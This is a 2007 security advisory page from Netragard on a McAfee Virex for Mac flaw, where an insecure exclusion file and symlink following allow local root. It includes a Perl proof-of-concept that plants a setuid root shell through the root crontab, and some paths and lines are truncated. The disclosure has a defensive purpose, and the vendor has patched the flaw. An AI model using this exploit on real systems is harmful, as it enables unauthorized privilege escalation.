what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Netragard Security Advisory 2007-02-20

Netragard Security Advisory 2007-02-20
Posted Mar 6, 2007
Authored by Kevin Finisterre, Netragard | Site netragard.com

Netragard, L.L.C Advisory - McAfee Virex contains an exploitable feature that enables users to define what files should be excluded for scanning. This feature relies on a configuration file with insecure privileges and is located in /Library/Application Support. Any user on the system can modify or delete the configuration file thus affecting what Virex will scan. Versions 7.7 and below are affected.

tags | exploit
SHA-256 | a3cb1e800dcc7d0c7dfc001dd8db9bc345f0a9944f95a36846b83a05d5b0d489

Netragard Security Advisory 2007-02-20

Change Mirror Download
Hash: SHA1

******************** Netragard, L.L.C Advisory* *******************

Strategic Reconnaissance Team

http://www.netragard.com -- "We make I.T. Safe."

- -----------------------------------------------------------------------
If you intend to post this advisory on your web page please create a
clickable link back to the original Netragard advisory as the contents
of the advisory may be updated.

<a href=http://www.netragard.com/html/recent_research.html>
Netragard Research

[About Netragard]
- -----------------------------------------------------------------------
Netragard is a unique I.T. Security company whose services are
fortified by continual vulnerability research and development. This
ongoing research, which is performed by our Strategic Reconnaissance
Team, specifically focuses on Operating Systems, Software Products and
Web Applications commonly used by businesses internationally. We apply
the knowledge gained by performing this research to our professional
security services. This in turn enables us to produce high quality
deliverables that are the product of talented security professionals
and not those of automated scanners and tools. This advisory is the
product of research done by the Strategic Reconnaissance Team.

[Advisory Information]
- -----------------------------------------------------------------------
Contact : Adriel T. Desautels
Researcher : Kevin Finisterre
Advisory ID : NETRAGARD-20070220
Product Name : McAfee VirusScan for Mac (Virex)
Product Version : <= Virex 7.7
Vendor Name : McAfee
Type of Vulnerability : Local root exploit and Scan Bypass
Effort : Easy

[Product Description]
- -----------------------------------------------------------------------
Guard your Macintosh systems and users against all types of viruses and
malicious code, even new unknown threats with McAfee VirusScan for Mac."

- -- http://www.mcafee.com --

[Technical Summary]
- -----------------------------------------------------------------------
McAfee Virex contains an exploitable feature that enables users to
define what files should be excluded for scanning. This feature relies
on a configuration file with insecure privileges and is located in
/Library/Application Support. Any user on the system can modify or
delete the configuration file thus affecting what Virex will scan.

A simple example of such a modification would be to echo into the file
which in turn would cause Virex to ignore all files on the entire system.

[Technical Details]
- -----------------------------------------------------------------------
An exploitable vulnerability exists in McAfee Virex that can be used to
gain root privileges on an affected system. This vulnerability exists
within the feature that enables users to define files for scan exclusion.
The configuration file used to store scan exclusion files has insecure
permissions of "rw-rw-rw" and as such can be modified or removed by any

Upon system boot the VShieldCheck process that runs with root privileges
verifies the existence of the VShieldExecute.txt file located at:


If VShieldCheck does not find the file at boot then it recreates the
file with the rw-rw-rw permissions. The exact command that it uses to
set those permissions is shown below:

SNOsoft-virexuser$ strings /usr/local/vscanx/VShieldCheck | grep chmod
/bin/chmod a+rw '%s' >/dev/null 2>&1

The VShieldCheck process does not check for symlinks prior to creating
the VShieldExecute.txt file. If an attacker creates a symlinks to:



/Library/Application Support/Virex/VShieldExclude.txt

then the file /var/cron/tabs/root will be created with writable
permissions by the VShieldCheck process at the next system boot.
Once the file is created the attacker can insert arbitrary commands
into the newly created cron file that will be executed with root


SNOsoft-virexuser$ crontab -l
crontab: no crontab for virexuser
SNOsoft-virexuser$ Desktop/pwn_virex.pl

Usage: Desktop/pwn_virex.pl <target>


0 . Virex 7.7.dmg

SNOsoft-virexuser$ Desktop/pwn_virex.pl 0
*** Target: Virex 7.7.dmg "/Library/Application
wait for a reboot a cron run...
SNOsoft-virexuser$ crontab -l
* * * * * /usr/bin/perl /Users/Shared/droptab.pl
SNOsoft-virexuser$ ls -al /Library/Application\ Support/Virex/
total 88
drwxrwxr-x 5 root admin 170 Oct 15 22:08 .
drwxrwxr-x 10 root admin 340 Nov 3 11:11 ..
lrwxr-xr-x 1 virusbar admin 19 Oct 15 22:08 VShieldExclude.txt
- -> /var/cron/tabs/root
- -rwxr-xr-x 1 root wheel 530 Aug 18 2005
- -rwxr-xr-x 1 root admin 32813 Aug 18 2005 digest.plist

After a reboot and a cycle of cron there will be a setuid root shell at

[Proof Of Concept]
- -----------------------------------------------------------------------

# http://www.digitalmunition.com
# written by kf (kf_lists[at]digitalmunition[dot]com)
# Following symlinks is bad mmmmmmmmmmkay!

$dest = "/var/cron/tabs/root";

$tgts{"0"} = "Virex 7.7.dmg:\"/Library/Application
Support/Virex/VShieldExclude.txt\" ";

unless (($target) = @ARGV) {
print "\n\nUsage: $0 <target> \n\nTargets:\n\n";

foreach $key (sort(keys %tgts)) {
($a,$b) = split(/\:/,$tgts{"$key"});
print "\t$key . $a\n";

print "\n";
exit 1;

($a,$b) = split(/\:/,$tgts{"$target"});
print "*** Target: $a $b\n";

# Set aside a backdoor that we will chmod and chown later
printf BD "main()\n";
printf BD "{ seteuid(0); setegid(0); setuid(0); setgid(0);
system(\"/bin/sh -i\"); }\n";
#system("gcc -o /Users/Shared/shX /tmp/pwnrex.c");
system("cp /usr/bin/id /Users/Shared/shX"); # this is for those
without gcc.

# set aside root crontab dropper
print PH "system\(\"echo \'* * * * * /usr/sbin/chown root:
/Users/Shared/shX; /bin/chmod 4755 /Users/Shared/shX\' >

# rm the existing log file and symlink it to the root crontab file. A
reboot will be required to exploit this.
system("rm -rf $b; ln -s $dest $b");

# start up a crontab request that will be *VERY* useful after the
machine has rebooted.
system("echo '* * * * * /usr/bin/perl /Users/Shared/droptab.pl; sleep
90; crontab /Users/Shared/xxx' >
system("echo '* * * * * /usr/bin/id' > /Users/Shared/xxx");
system("crontab /tmp/user_cron");

print "wait for a reboot and a cron run...\n"

*** The code above will provide a root shell ***

Netragard's SNOsoft Research Team was able to use this issue
perform privilege escalation and gain root privileges.

[Vendor Status]
- -----------------------------------------------------------------------
Vendor Notified on 11/06/06
Vendor Patched on 02/13/07
Vendor advisory and patch has been posted at the following URL:


McAfee engineers were very helpful throughout the entire process.

- ----------------------http://www.netragard.com-------------------------
Netragard, L.L.C. assumes no liability for the use of the information
provided in this advisory. This advisory was released in an effort to
help the I.T. community protect themselves against a potentially
dangerous security hole. This advisory is not an attempt to solicit

<a href="http://www.netragard.com>

Version: GnuPG v1.4.5 (Darwin)

Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    0 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    0 Files
  • 16
    Apr 16th
    0 Files
  • 17
    Apr 17th
    0 Files
  • 18
    Apr 18th
    0 Files
  • 19
    Apr 19th
    0 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    0 Files
  • 23
    Apr 23rd
    0 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags


packet storm

© 2022 Packet Storm. All rights reserved.

Security Services
Hosting By